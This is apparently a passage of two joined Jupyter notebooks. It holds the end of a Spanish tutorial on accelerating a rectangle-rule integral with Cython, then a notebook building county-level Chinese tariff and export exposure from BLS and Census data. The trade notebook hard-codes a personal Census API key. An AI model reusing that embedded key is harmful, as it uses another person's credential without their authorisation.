Rcf_compiled.Rcf(f,0,1,n) ``` **Obs:** El error relativo anterior es más grande del que se obtenía anteriomente, por ello se utilizará el módulo `cythonize` (haciendo pruebas e investigando un poco se obtuvo la precisión de antes). ``` %%file Rcf_cython2.pyx def Rcf(f,a,b,n): #Rcf: rectángulo compuesto para f """ Compute numerical approximation using rectangle or mid-point method in an interval. Nodes are generated via formula: x_i = a+(i+1/2)h_hat for i=0,1,...,n-1 and h_hat=(b-a)/n Args: f (lambda expression): lambda expression of integrand a (int): left point of interval b (int): right point of interval n (int): number of subintervals Returns: Rcf (float) """ h_hat=(b-a)/n nodes=[a+(i+1/2)*h_hat for i in range(0,n)] sum_res=0 for node in nodes: sum_res=sum_res+f(node) return h_hat*sum_res %%file setup2.py from distutils.core import setup from Cython.Build import cythonize setup(ext_modules = cythonize("Rcf_cython2.pyx", compiler_directives={'language_level' : 3}) ) #es posible que la solución del ejercicio anterior tenga que ver con el Warning #y uso de la directiva language_level %%bash python3 setup2.py build_ext --inplace import Rcf_cython2 n=10**6 start_time = time.time() aprox=Rcf_cython2.Rcf(f,0,1,n) end_time = time.time() aprox secs = end_time-start_time print("Rcf tomó",secs,"segundos" ) ``` Revisar error relativo: ``` err_relativo(aprox,obj) ``` ## Vía el comando magic `%cython` ``` %load_ext Cython %%cython def Rcf(f,a,b,n): #Rcf: rectángulo compuesto para f """ Compute numerical approximation using rectangle or mid-point method in an interval. Nodes are generated via formula: x_i = a+(i+1/2)h_hat for i=0,1,...,n-1 and h_hat=(b-a)/n Args: f (lambda expression): lambda expression of integrand a (int): left point of interval b (int): right point of interval n (int): number of subintervals Returns: Rcf (float) """ h_hat=(b-a)/n nodes=[a+(i+1/2)*h_hat for i in range(0,n)] sum_res=0 for node in nodes: sum_res=sum_res+f(node) return h_hat*sum_res n=10**6 start_time = time.time() aprox=Rcf(f,0,1,n) end_time = time.time() secs = end_time-start_time print("Rcf tomó",secs,"segundos" ) err_relativo(aprox,obj) %timeit -n 5 -r 10 Rcf(f,0,1,n) ``` # Cython Annotations para analizar un bloque de código Cython tiene una opción de *annotation* que generará un archivo con extensión `.html` que se puede visualizar en jupyterlab o en un browser. Cada línea puede ser expandida haciendo un doble click que mostrará el código C generado. Líneas más amarillas refieren a más llamadas en la máquina virtual de Python (por máquina virtual de Python entiéndase la maquinaria que utiliza Python para traducir el lenguaje de alto nivel a [bytecode](https://en.wikipedia.org/wiki/Bytecode) ), mientras que líneas más blancas significan "más código en C y no Python". El objetivo es remover la mayor cantidad de líneas amarillas posibles (pues típicamente son costosas en tiempo y si las líneas están dentro de loops son todavía más costosas) y terminar con códigos cuyas annotations sean lo más blancas posibles. Concentra tu atención en las líneas que son amarillas y están dentro de los loops, no pierdas tu tiempo en líneas amarillas que están fuera de loops y que no causan una ejecución lenta (para identificar esto perfila tu código). ## Vía línea de comando: ``` %%bash $HOME/.local/bin/cython -a Rcf_cython.pyx ``` Ver archivo creado: `Rcf_cython.html` ## Vía comando de magic y flag `-a`: ``` %%cython? %%cython -a def Rcf(f,a,b,n): #Rcf: rectángulo compuesto para f """ Compute numerical approximation using rectangle or mid-point method in an interval. Nodes are generated via formula: x_i = a+(i+1/2)h_hat for i=0,1,...,n-1 and h_hat=(b-a)/n Args: f (lambda expression): lambda expression of integrand a (int): left point of interval b (int): right point of interval n (int): number of subintervals Returns: Rcf (float) """ h_hat=(b-a)/n nodes=[a+(i+1/2)*h_hat for i in range(0,n)] sum_res=0 for node in nodes: sum_res=sum_res+f(node) return h_hat*sum_res ``` <img src="https://dl.dropboxusercontent.com/s/0fjkhg66rl0v2n0/output_cython_1.png?dl=0" heigth="500" width="500"> **Nota:** la imagen anterior es un screenshot que generé ejecutando la celda anterior. **Obs:** para este ejemplo la línea $18$ es muy amarilla y está dentro del loop. Recuérdese de la nota [1.6.Perfilamiento_Python.ipynb](https://github.com/ITAM-DS/analisis-numerico-computo-cientifico/blob/master/temas/I.computo_cientifico/1.6.Perfilamiento_Python.ipynb) que es una línea en la que se gasta parte del tiempo total de ejecución del código. Una primera opción que tenemos es crear los nodos para el método de integración dentro del loop y separar el llamado a la *list comprehension* `nodes=[a+(i+1/2)*h_hat for i in range(0,n)]`: ``` %%cython -a def Rcf2(f,a,b,n): #Rcf: rectángulo compuesto para f """ Compute numerical approximation using rectangle or mid-point method in an interval. Nodes are generated via formula: x_i = a+(i+1/2)h_hat for i=0,1,...,n-1 and h_hat=(b-a)/n Args: f (lambda expression): lambda expression of integrand a (int): left point of interval b (int): right point of interval n (int): number of subintervals Returns: Rcf (float) """ h_hat=(b-a)/n sum_res=0 for i in range(0,n): x=a+(i+1/2.0)*h_hat sum_res+=f(x) return h_hat*sum_res ``` <img src="https://dl.dropboxusercontent.com/s/d5atbbiivsh2mgk/output_cython_2.png?dl=0" heigth="500" width="500"> **Nota:** la imagen anterior es un screenshot que generé ejecutando la celda anterior. ``` n=10**6 start_time = time.time() aprox=Rcf2(f,0,1,n) end_time = time.time() secs = end_time-start_time print("Rcf2 tomó",secs,"segundos" ) err_relativo(aprox,obj) %timeit -n 5 -r 10 Rcf2(f,0,1,n) ``` **Obs:** para este ejemplo las líneas $17$ y $18$ son muy amarillas y están dentro del loop. Además son líneas que involucran tipos de datos que no cambiarán en la ejecución de cada loop. Nos enfocamos a hacerlas más blancas... Una primera opción es **declarar los tipos de objetos** que están involucrados en el loop utilizando la sintaxis `cdef`: ``` %%cython -a def Rcf3(f,double a,double b,unsigned int n): #obsérvese la declaración de los tipos """ Compute numerical approximation using rectangle or mid-point method in an interval. Nodes are generated via formula: x_i = a+(i+1/2)h_hat for i=0,1,...,n-1 and h_hat=(b-a)/n Args: f (lambda expression): lambda expression of integrand a (int): left point of interval b (int): right point of interval n (int): number of subintervals Returns: Rcf (float) """ cdef unsigned int i #obsérvese la declaración de los tipos cdef double x,sum_res, h_hat #obsérvese la declaración de los tipos h_hat=(b-a)/n sum_res=0 for i in range(0,n): x=a+(i+1/2.0)*h_hat sum_res+=f(x) return h_hat*sum_res ``` <img src="https://dl.dropboxusercontent.com/s/ttxyxbkbmtxptdt/output_cython_3.png?dl=0" heigth="500" width="500"> **Nota:** la imagen anterior es un screenshot que generé ejecutando la celda anterior. ``` n=10**6 start_time = time.time() aprox=Rcf3(f,0,1,n) end_time = time.time() secs = end_time-start_time print("Rcf3 tomó",secs,"segundos" ) err_relativo(aprox,obj) %timeit -n 5 -r 10 Rcf3(f,0,1,n) ``` **Obs:** al definir tipos éstos sólo serán entendidos por Cython y **no por Python**. Cython utiliza estos tipos para convertir el código de Python a objetos de C, éstos objetos no tienen que convertirse de vuelta a objetos de Python. Entonces perdemos flexibilidad pero ganamos velocidad. Y podemos bajar más el tiempo al definir la función que será utilizada: ``` %%cython -a import math def Rcf4(double a,double b,unsigned int n): #Rcf: rectángulo compuesto para f """ Compute numerical approximation using rectangle or mid-point method in an interval. Nodes are generated via formula: x_i = a+(i+1/2)h_hat for i=0,1,...,n-1 and h_hat=(b-a)/n Args: f (lambda expression): lambda expression of integrand a (int): left point of interval b (int): right point of interval n (int): number of subintervals Returns: Rcf (float) """ cdef unsigned int i cdef double x,sum_res, h_hat h_hat=(b-a)/n sum_res=0 for i in range(0,n): x=a+(i+1/2.0)*h_hat sum_res+=math.exp(-x**2) return h_hat*sum_res ``` <img src="https://dl.dropboxusercontent.com/s/a5upwaoveixxuza/output_cython_4.png?dl=0" heigth="500" width="500"> **Nota:** la imagen anterior es un screenshot que generé ejecutando la celda anterior. ``` n=10**6 start_time = time.time() aprox=Rcf4(0,1,n) end_time = time.time() secs = end_time-start_time print("Rcf4 tomó",secs,"segundos" ) err_relativo(aprox,obj) %timeit -n 5 -r 10 Rcf4(0,1,n) ``` **Obs:** estamos ganando velocidad pues el compilador de C `gcc` puede optimizar funciones de bajo nivel para operar en los bytes que están asociados a las variables y no realiza llamadas a la máquina virtual de Python. **Ejercicios** 1. Realiza el análisis con las herramientas revisadas en esta nota para las reglas del trapecio y de Simpson de la nota [1.5.Integracion_numerica](https://github.com/ITAM-DS/analisis-numerico-computo-cientifico/blob/master/temas/I.computo_cientifico/1.5.Integracion_numerica.ipynb). **Referencias** 1. M. Gorelick, I. Ozsvald, High Performance Python, O'Reilly Media, 2014.
github_jupyter
### Trade and Tariff Dataset at the County level This notebook constructs a trade and county-level tariff data, over time, dataset. **This is a core notebook to the project** so I will try and explain each step clearly. This is one aspect of my code to be scrutinized. It outputs the county-level trade and tariff dataset as a `.parquet` file. ``` import pandas as pd # data package import matplotlib.pyplot as plt # graphics import datetime as dt import numpy as np import requests, io # internet and input tools import zipfile as zf # zip file tools import os #import weightedcalcs as wc #import numpy as np import pyarrow as pa import pyarrow.parquet as pq file_path = os.getcwd() fig_path = file_path +"\\figures" ``` ### Step 1 Grab and manipulate the county level data for 2017 So we will grab the single file, then adjust it to suit our needs. The needs are to construct county-level employment weights to create a trade exposure metric and tariff metric for each county. ``` print("") print("**********************************************************************************") print("Downloading and processing BLS file") print("") url = "https://data.bls.gov/cew/data/files/2017/csv/2017_annual_singlefile.zip" # This will read in the annual, single file. It's big, but has all we want... r = requests.get(url) # convert bytes to zip file bls_sf = zf.ZipFile(io.BytesIO(r.content)) print('Type of zipfile object:', type(bls_sf)) clist = ['area_fips', 'own_code', 'industry_code', 'agglvl_code', 'size_code', 'year', 'disclosure_code', 'annual_avg_estabs', 'annual_avg_emplvl', 'total_annual_wages','avg_annual_pay'] df = pd.read_csv(bls_sf.open(bls_sf.namelist()[0]), usecols= clist) # SHOULD PRESPECIFY TYPES TO df.head() ``` Then the file below cleans stuff up. The most important is the `NAICS_county_level` which selects the NAICS aggregation and then the county aggregation. Website describing this is here: [https://data.bls.gov/cew/doc/titles/agglevel/agglevel_titles.htm](https://data.bls.gov/cew/doc/titles/agglevel/agglevel_titles.htm) ``` NAICS_county_level = 75 # This is the code that will select only counties at the 3 digit NAICS level df_county = df[df.agglvl_code == NAICS_county_level].copy() df_county = df_county[df_county.own_code == 5] # Only grab private stuff df_county = df_county[(df_county.area_fips.str[0:2] != "72") & (df_county.area_fips.str[0:2] != "78") & (df_county.area_fips.str[0:2] != "02") & (df_county.area_fips.str[0:2] != "15")] #Drop puerto rico, alaska, hawaii...this mayb not be doing what I think it is...as it looks like these guys are there # Does not matter as analysis is performed withthem, drop them when do the map. df_county["sup_ind"] = df_county.industry_code.str[1].astype(int) # sometimes there are super industries floating around we want to drop them. # not clear if this matters with the conditioning all ready df_county = df_county[df_county["sup_ind"] > 0] df_county.area_fips = df_county.area_fips.astype(str) df_national = df_county.groupby("industry_code").agg({"annual_avg_emplvl": "sum"}) df_national.reset_index(inplace = True) df_national.rename({"annual_avg_emplvl":"nat_emplvl"}, axis = 1, inplace = True) df_national.head() ``` Let's compute annual employment. ``` df_county.annual_avg_emplvl.sum() ``` which matches well with FRED (https://fred.stlouisfed.org/series/USPRIV) in 2017 (off by a couple million) --- ### Step 2 Bring in the trade data Here we will read in data at the HS6 level, exports to china, over time. ``` print("") print("**********************************************************************************") print("Downloading and processing Trade Data") print("") my_key = "&key=34e40301bda77077e24c859c6c6c0b721ad73fc7" # This is my key. I'm nice and I have it posted. If you will be doing more with this # please get your own key! end_use = "hs?get=E_COMMODITY,CTY_CODE,ALL_VAL_MO,CTY_NAME" url = "https://api.census.gov/data/timeseries/intltrade/exports/" + end_use url = url + my_key + "&time==from+2015-01" + "&COMM_LVL=HS6" url = url + "&CTY_CODE=5700" r = requests.get(url) df_china_trade = pd.DataFrame(r.json()[1:]) # This then converts it to a dataframe # Note that the first entry is the labels df_china_trade.columns = r.json()[0] df_china_trade.time = pd.to_datetime(df_china_trade.time, format="%Y-%m") # This is so I can call this correctly... df_china_trade["china_trade"] = df_china_trade.ALL_VAL_MO.astype(float) df_china_trade.E_COMMODITY = df_china_trade.E_COMMODITY.astype(str) df_china_trade.tail(10) ``` Now grab **total exports** (not just China) by HS6 level, overtime. ``` r end_use = "hs?get=E_COMMODITY,ALL_VAL_MO" url = "https://api.census.gov/data/timeseries/intltrade/exports/" url = url + end_use + my_key + "&time==from+2015-01" + "&COMM_LVL=HS6" r = requests.get(url) df_all_trade = pd.DataFrame(r.json()[1:]) # This then converts it to a dataframe # Note that the first entry is the labels df_all_trade.columns = r.json()[0] df_all_trade.time = pd.to_datetime(df_all_trade.time, format="%Y-%m") # This is so I can call this correctly... df_all_trade["total_trade"] = df_all_trade.ALL_VAL_MO.astype(float) df_all_trade.E_COMMODITY = df_all_trade.E_COMMODITY.astype(str) df_all_trade.head(10) ``` Then combine the china trade and the all trade dataset. ``` dftrade = df_all_trade.merge(df_china_trade[["E_COMMODITY", "time","china_trade"]], left_on = ["E_COMMODITY", "time"], right_on = ["E_COMMODITY", "time"], how = "left") dftrade.set_index("time", inplace = True) dftrade.drop(["ALL_VAL_MO"], axis = 1, inplace = True) ``` --- ### Step 3 Bring in concordance, create annual and national data set. Assign Naics codes, create a annual 2017 `df`, create the trade wieghts by naics so we can aggregate the tariffs. ``` dftrade_17 = dftrade.loc["2017"].groupby("E_COMMODITY").agg({"china_trade":"sum"}) ``` Use the concordance from the US Census to go from HS6 to NAICS. In the code below there are two different approaches to working with the concordance. The latter one makes more sense. Ultimatly does not matter. ``` #url = "https://www.census.gov/foreign-trade/reference/codes/concordance/expconcord17.xls" #df_concordance = pd.read_excel(url, dtype = {"commodity": str, "naics": str}) #df_concordance["hs8"] = df_concordance.commodity.str[0:8] # truncate down to get the hs8 #df_concordance["hs6"] = df_concordance.commodity.str[0:6] # truncate down to get the hs6 #df_concordance["naics3"] = df_concordance["naics"].str[0:3] #dict_concordance = dict(zip(df_concordance.hs6,df_concordance.naics)) # This creates a dictionaty from which we can map the hs6 to the naics codes # Full disclosure. There is an issue with the creation of the dictionary as a unique # mapping from hs6 to naics. The notebook ``alt_hs_naics_mapping.ipynb'' provides a complete discussion. # Ultimatly, this does not matter for the results (relative to the alternative below) # Below is a fix/alternative approach to creating the mapping from hs6 to naics. In the # cases where there are multiple naics codes for each hs6 code, it assigns the naics code that is # associated with the most trade. # For future reference check this out: https://www.bea.gov/industry/zip/NDN0317.zip file_path = os.getcwd() alt_concordance = pq.read_table(file_path + "\\data\\alt_concordance.parquet").to_pandas() alt_concordance.head() dict_concordance = dict(zip(alt_concordance.hs6,alt_concordance.naics)) ``` Then create this at different levels ``` dftrade_17["hs6"] = dftrade_17.index dftrade_17["naics"] = dftrade_17["hs6"].map(dict_concordance) dftrade_17["naics4"] = dftrade_17["naics"].str[0:4] dftrade_17["naics3"] = dftrade_17["naics"].str[0:3] dftrade_17.rename({"china_trade":"2017_china_trade"}, axis = 1, inplace = True) dftrade_17.head() ``` This look good, we have the commodity (as the index), chinese trade, and then different codes to map stuff to. Here we will work at the NAICS 3 digit level. The rational for this is that if you go more disaggregate, then confidentialy issues lead to employment at the county-level to be drpoed from the QECW. This is just a simple ``.groupby`` operation. ``` dftrade_17_naics3 = dftrade_17.groupby("naics3").agg({"2017_china_trade": "sum"}) dftrade_17_naics3.head() ``` Now merge this with the national employment by naics data set. ``` df_national = df_national.merge(dftrade_17_naics3["2017_china_trade"], left_on = "industry_code", right_index = True, how = "left") df_national["2017_china_trade"].replace(np.nan, 0, inplace = True) df_national["trd_wts"] = (df_national["2017_china_trade"]/df_national["2017_china_trade"].sum()) ``` Then check to make sure that the trade weights sum up to one. ``` df_national.trd_wts.sum() dftrade["hs6"] = dftrade.E_COMMODITY dftrade["naics"] = dftrade["hs6"].map(dict_concordance) dftrade["naics4"] = dftrade["naics"].str[0:4] dftrade["naics3"] = dftrade["naics"].str[0:3] ``` --- ### Step 4 Add in the tariff data... Now here is one of the harder parts. We want to take the time series data, then layer on the tariff data by product and time. So we will have a big data frame that is (at HS6 level) over time, but each unit of observation has the associated 2017 annual value and the tariff at that date. So we will use the `map` function to exploit this. ``` #tariffs = pd.read_csv("tariff_list_naics.csv", dtype = {"HS-8 code": str,"HS6": str,"naics": str,"naics4": str}) file_path = os.getcwd() + "\\data" # bring in the tariff data tariffs = pd.read_csv(file_path + "\\new_tariff_list_max.csv", dtype = {"hs6": str}) # This is the tariff dataset created by updated_tariff_data.ipynb (note the max tariff means taking the largest value # when going from Chinese hs10 to hs6. This does not matter, if anything gives more conservative resutls) tariffs.time_of_tariff = pd.to_datetime(tariffs.time_of_tariff, format="%Y-%m") # make sure the time is there. tariffs.set_index("time_of_tariff",inplace = True) tariffs.head() ``` Then we create dictionaries to do the following " you tell me HS, I tell you tariff" by time. ``` initial_tariff = dict(zip(tariffs.loc["2018-01-01"].hs6,tariffs.loc["2018-01-01"].tariff)) # These are the initial mfn tariffs. We will apply these from 2017 up untill the changes... tariff_dict_232 = dict(zip(tariffs.loc["2018-04-02"].hs6,tariffs.loc["2018-04-02"].tariff)) #These are the section 232 tariffs, response to US steel and aluminum. tariff_dict_r1 = dict(zip(tariffs.loc["2018-07-06"].hs6,tariffs.loc["2018-07-06"].tariff)) #tariff_dict_r1 = dict(zip(tariffs.loc["2018-07-06"].HS6,tariffs.loc["2018-07-06"].tariff)) # This will create a mapping from HS6 to tariff, you tell me HS, I tell you tariff tariff_dict_r2 = dict(zip(tariffs.loc[dt.datetime(2018,8,23)].hs6,tariffs.loc[dt.datetime(2018,8,23)].tariff)) #tariff_dict_r2 = dict(zip(tariffs.loc[dt.datetime(2018,8,23)].HS6,tariffs.loc[dt.datetime(2018,8,23)].tariff)) # This will create a mapping from HS6 to tariff, you tell me HS, I tell you tariff, round 2 tariff_dict_r3 = dict(zip(tariffs.loc[dt.datetime(2018,9,24)].hs6,tariffs.loc[dt.datetime(2018,9,24)].tariff)) #tariff_dict_r3 = dict(zip(tariffs.loc[dt.datetime(2018,9,24)].HS6,tariffs.loc[dt.datetime(2018,9,24)].tariff)) # This will create a mapping from HS6 to tariff, you tell me HS, I tell you tariff, round 3 tariff_dict_mfn = dict(zip(tariffs.loc["2018-11-01"].hs6,tariffs.loc["2018-11-01"].tariff)) # This reflects mfn adjustments that China made later in the year. tariff_dict_mfn_2019 = dict(zip(tariffs.loc["2019-01-02"].hs6,tariffs.loc["2019-01-02"].tariff)) # This reflects mfn adjustments and auto adjustment China made at the start of 2019 ``` Then assign the tariffs to the hs6 codes. As mentioned below, the ``.update`` function updates the product code with a new tariff if there is one in the new dictionary. ``` dftrade["tariff"] = 0 # Then use the map function which will fill in the tariff in the correct places.. # Note the key issue was that the dictionaries were overwritting stuff, hence # the update... # Start with the MFN... dftrade.loc["2015-01":,"tariff"] = dftrade.loc["2015-01":,"hs6"].map(initial_tariff) #print("done") # Now update given the 232 response initial_tariff.update(tariff_dict_232) dftrade.loc["2018-04":,"tariff"] = dftrade.loc["2018-04":,"hs6"].map(initial_tariff) #print("done") # This is the big Phase 1 of the war initial_tariff.update(tariff_dict_r1) dftrade.loc["2018-07":,"tariff"] = dftrade.loc["2018-07":,"hs6"].map(initial_tariff) #print("done") # Here is phase 2 initial_tariff.update(tariff_dict_r2) dftrade.loc["2018-09":,"tariff"] = dftrade.loc["2018-09":,"hs6"].map(initial_tariff) #print("done") # Here is phase 3 initial_tariff.update(tariff_dict_r3) dftrade.loc["2018-10":,"tariff"] = dftrade.loc["2018-10":,"hs6"].map(initial_tariff) #print("done") # China then adjusts the mfn initial_tariff.update(tariff_dict_mfn) dftrade.loc["2018-11":,"tariff"] = dftrade.loc["2018-11":,"hs6"].map(initial_tariff) #print("done") # An update on the mfn's initial_tariff.update(tariff_dict_mfn_2019) dftrade.loc["2019-01":,"tariff"] = dftrade.loc["2019-01":,"hs6"].map(initial_tariff) dftrade["tariff"] = dftrade["tariff"].replace(np.nan,0) dftrade[dftrade["tariff"] == 25].head() dftrade["2018-08"].head(25) ``` This is looking good, not how you can see the tariffs (in august of 2018) hitting in the right places. Now merge it with the 2017 annual trade data so we can construct trade weighted averages of tariffs.... ``` dftrade = dftrade.merge(dftrade_17["2017_china_trade"], how = "inner", left_on = "E_COMMODITY", right_index = True) dftrade[dftrade.naics3 == "111"].sort_values(by = ["tariff"], ascending = False) ``` Looks like we accomplished this task. Now what we will do is create a function which will make the trade weighted verage of the tariff rates as we aggregate across product codes. ``` def trd_weighted_avg(df): # A function to create the trade weighted average of the tariff rates # by round... trd_w_avg = df["tariff"].multiply(df["2017_china_trade"],axis = 0).sum() # here wuse the 2017 annual values to weight it trd_w_avg = trd_w_avg / df["2017_china_trade"].sum() foo = {"tariff_trd_w_avg": [trd_w_avg ], "total_trade": df["total_trade"].sum(), "china_trade" : df["china_trade"].sum()} return pd.DataFrame(foo) ``` Now, `groupby` time and NAICS code (in this case 3), apply the trade weighted function above. Then the resulting data frame should be time, and naics tariffs and the total trade. ``` grp = dftrade.groupby(["time","naics3"]) exp_trf_bynaics = grp.apply(trd_weighted_avg) exp_trf_bynaics = exp_trf_bynaics.droplevel(2) exp_trf_bynaics.loc["2018-01"].head(15) fig, ax = plt.subplots(figsize = (12,8)) mike_blue = tuple(np.array([20, 64, 134]) / 255) tariffs_over_time = exp_trf_bynaics.groupby(["time"]).agg({"tariff_trd_w_avg": "mean"}) ax.plot(tariffs_over_time, alpha = 0.95, color = mike_blue, linewidth = 4) #ax.plot(auto_least, alpha = 0.95, color = mike_blue, linewidth = 4, # label = 'Difference between top and bottom\nquartile of county level Chinese tariff exposure') #ax.plot(, alpha = 0.95, color = mike_blue , linewidth = 4, # label = 'Bottom Quantile of Chinese Tariff Exposure Counties') ax.set_xlim(dt.datetime(2017,3,1),dt.datetime(2019,1,1)) ax.spines["right"].set_visible(False) ax.spines["top"].set_visible(False) ax.yaxis.grid(alpha= 0.5, linestyle= "--") label_descrip = "Tariff" ax.set_ylabel(label_descrip, fontsize = 14) ax.axvline(dt.datetime(2017,4,1), linewidth = 2, ls = "--", color = 'k', alpha =0.15) ax.axvline(dt.datetime(2017,8,1), linewidth = 2, ls = "--", color = 'k', alpha =0.15) ax.axvline(dt.datetime(2018,3,1), linewidth = 2, ls = "--", color = 'k', alpha =0.15) ax.axvline(dt.datetime(2018,4,4), linewidth = 2, ls = "--", color = 'k', alpha =0.15) ax.axvline(dt.datetime(2018,7,6), linewidth = 2, ls = "--", color = 'k', alpha =0.15) ax.axvline(dt.datetime(2018,8,23), linewidth = 2, ls = "--", color = 'k', alpha =0.25) ax.axvline(dt.datetime(2018,9,24), linewidth = 2, ls = "--", color = 'k', alpha =0.15) ax.axvline(dt.datetime(2018,12,1), linewidth = 2, ls = "--", color = 'k', alpha =0.15) ax.set_title("Average Chinese Tariff on US Exports", fontsize = 16, loc= "left" ) ############################################################################################## ax.annotate( "4/2018: US announces intention\nto impose 301 tariffs on China", xy=(dt.datetime(2018,4,3), 7), # This is where we point at... xycoords="data", # Not exactly sure about this xytext=(dt.datetime(2017,5,3), 8), # This is about where the text is horizontalalignment="left", # How the text is alined arrowprops={ "arrowstyle": "-|>", # This is stuff about the arrow "connectionstyle": "angle3,angleA=0,angleB=45", "color": "black", "alpha": 0.55 }, fontsize=11, ) ############################################################################################## ax.annotate( "7/2018: China imposes first phase of\nretaliatory tariffs", xy=(dt.datetime(2018,7,6), 9), # This is where we point at... xycoords="data", # Not exactly sure about this xytext=(dt.datetime(2017,6,3), 10), # This is about where the text is horizontalalignment="left", # How the text is alined arrowprops={ "arrowstyle": "-|>", # This is stuff about the arrow "connectionstyle": "angle3,angleA=345,angleB=50", "color": "black", "alpha": 0.55 }, fontsize=11, ) ################################################################################### ax.annotate( "8-9/2018: China imposes second and \nthird phases of retaliatory tariffs", xy=(dt.datetime(2018,8,23), 12), color='white',# This is where we point at... xycoords="data", # Not exactly sure about this xytext=(dt.datetime(2017,9,3), 12), # This is about where the text is horizontalalignment="left", # How the text is alined arrowprops={ "arrowstyle": "-|>", # This is stuff about the arrow "connectionstyle": "angle3,angleA=345,angleB=80", "color": "black", "alpha": 0.55 }, fontsize=11, ) ################################################################################### ax.annotate( "8-9/2018: China imposes second and \nthird phases of retaliatory tariffs", xy=(dt.datetime(2018,9,24), 16), # This is where we point at... xycoords="data", # Not exactly sure about this xytext=(dt.datetime(2017,9,3), 12), # This is about where the text is horizontalalignment="left", # How the text is alined arrowprops={ "arrowstyle": "-|>", # This is stuff about the arrow "connectionstyle": "angle3,angleA=3,angleB=36", "color": "black", "alpha": 0.55 }, fontsize=11, ) ############################################################################################## ############################################################################################## # if not os.path.exists(fig_path): os.makedirs(fig_path) plt.savefig(fig_path + "\\tariffs_time.pdf", bbox_inches = "tight", dip = 3600) plt.show() ``` This simple plot looks a lot like the Bowen figures. Note that the dip is all about China changing their MFN tariffs in (what appears to be) certain consumer orinted catagories as Bowen point out. So clothing stuff falls, while they are hammering the ag. products. Looks like we accomplished this task. Just a couple of things to clean up then we are ready to move onto the next step. ``` exp_trf_bynaics["time"] = exp_trf_bynaics.index.get_level_values(0) exp_trf_bynaics = exp_trf_bynaics.droplevel(level=0) exp_trf_bynaics.loc["111"] ``` --- ### Step 3 Merge trade data with the county data This is the most time consuming step (interms of compuation time). So start with the county data set, `groupby` county, then apply a function which will create (i) time varying exports (which are constructed with the 2017 weightes) and (ii) time varying tariffs (also constructed using the 2017) weights. The final want is a big dataframe that has county, time, export exposure and tariff exposure. ``` print("") print("**********************************************************************************") print("Constructing County-Level Tariffs and Exports") print("") grp = df_county.groupby("area_fips") # This creates groups at the county level. # Let's just look at one of the groups... grp.get_group("1001").head() ``` Below are the two key functions that deliver this. Basically it does the following: - Take a group at county level, merge it with the national level data set, so the resulting `df` has the county and nation. - Create the weights. - Then merge it with the exports, this will now be a df with exports varying over time, but with the fixed weights associated with each entry. - Then aggregate the national exports by NAICS by the county level weights, giving a county level time series of exports. --- **Updates** - The tariff measure does the following: fix a county, take employment in industry $i$ and divide by total county employment, then sum up tariffs across industries with the weights being the county level share. The idea here is if all employment in a county is soy, then the "effective" tariff that the county faces is the soy tariff. In equation terms: here $c$ is county, $s$ is industry, $n$, below is nation. $\tau_{c,t} = \sum_{s\in S}\frac{L_{c,s}}{L_{c,S}} \tau_{s,t}$ Note that below, I make one further adjustment to make sure that $L_{c,S}$ is for all employment, not just the sum across $L_{c,s}$ - The export measure: What am I doing: take a county's employment in industry $i$ and divide by **national** level employment in industry $i$. Then a "county's" exports is the the sum across industries, weighted by the county's share of national employment in each industry. The idea here is, if a county's has all national level employment in an industry, all that industries exports will be assigned to that county. $\mbox{EX}_{c,t} = \frac{1}{L_{c,S,2017}}\sum_{s\in S}\frac{L_{c,s,2017}}{L_{n,s,2017}} \mbox{EX}_{s,t}$ and then I divide by total employment in the county to have a county per worker measure. This is done for exports to China and then export in total. Note that below, I make one further adjustment to make sure that $L_{c,S}$ is for all employment, not just the sum across $L_{c,s}$ ``` def create_trade_weights(df): # Takes in the county groupings and will return, for each county, a time series of export # exposure, tariffs, and other statistics. new_df = df.merge(df_national[["nat_emplvl", "industry_code", "trd_wts"]], how = "outer", left_on = "industry_code", right_on = "industry_code") # Merge the nation with the county, why, we want to make sure all the naics codes are lined up properly new_df["emp_wts"] = (new_df.annual_avg_emplvl/new_df.nat_emplvl) # create the weights... foo_df = exp_trf_bynaics.merge(new_df[["emp_wts","trd_wts", "industry_code", "annual_avg_emplvl"]], left_index = True, right_on = "industry_code") # Now each weight is for a NAICS code, we will merge it with the export trade data set, so for all naics, all time... # This is a big df whith all trade data and then the county's weights for each naics code foo_grp = foo_df.groupby("time") # group by time. foo = foo_grp.apply(trade_by_naics) # Then for each time gropuing, we aggregate across the naics codes according to the weights above. foo = foo.droplevel(1) foo["fips"] = df["area_fips"].astype(str).iloc[0] # some cleaning of the df foo["total_employment"] = new_df.annual_avg_emplvl.sum() # get total employment. return pd.DataFrame(foo) def trade_by_naics(df): # Simple function just to test about aggregation china_exp_pc = (1/df["annual_avg_emplvl"].sum())*(df["china_trade"]*df["emp_wts"]).sum() total_exp_pc = (1/df["annual_avg_emplvl"].sum())*(df["total_trade"]*df["emp_wts"]).sum() # the first term multiplies trade by the county's share of national level employment # then the outside term divides by number of workers in a county. #tariff_nwt_pc = (1/df["annual_avg_emplvl"].sum())*(df["tariff_trd_w_avg"]*df["emp_wts"]).sum() # This is the measure that makes most sense, need to justify it... tariff = ((df["annual_avg_emplvl"]*df["tariff_trd_w_avg"])/df["annual_avg_emplvl"].sum()).sum() # local employment share weighted tariff. So if all guys are in area are working in soy, # then they are facing the soybean tariff.... foo = {"total_exp_pc": [total_exp_pc], "china_exp_pc": [china_exp_pc], "tariff": [tariff], "emplvl_2017": df["annual_avg_emplvl"].sum()} return pd.DataFrame(foo) ``` Then apply the function to the county groups ``` trade_county = grp.apply(create_trade_weights) ``` And we are done and output the file to where we want it ``` trade_county.sort_values(by = ["tariff","emplvl_2017"], ascending = False).head(25) ``` **One more adjustment.** Notice that in the function, when we are merging, we are droping all the NAICS codes without trade. So these measures (total trade, china trade, and tariffs) are only conditional on being traded. This only matters in so far as the denominator, the ``df["annual_avg_emplvl"].sum()`` is concerned. To make the adjustment then, we multiply the employment measure in the denominator and then divide through by the ``total_employment`` measure. ``` trade_county["tariff"] = (trade_county["emplvl_2017"]/ trade_county["total_employment"])*trade_county["tariff"] trade_county["china_exp_pc"] = (trade_county["emplvl_2017"]/ trade_county["total_employment"])*trade_county["china_exp_pc"] trade_county["total_exp_pc"] = (trade_county["emplvl_2017"]/ trade_county["total_employment"])*trade_county["total_exp_pc"] os.getcwd() file_path = os.getcwd() + "\\data"+ "\\total_trade_data_2015.parquet" pq.write_table(pa.Table.from_pandas(trade_county.reset_index()), file_path) trade_county.sort_values(by = ["tariff","emplvl_2017"], ascending = False).head(50) exposure = pd.qcut(trade_county.xs('2015-1-1', level=1).tariff, 4 ,labels = False) most_exposed = exposure[exposure == 3].index.tolist() trade_county.loc[most_exposed].xs('2018-12-1', level=1).tariff.mean() exposure.head() 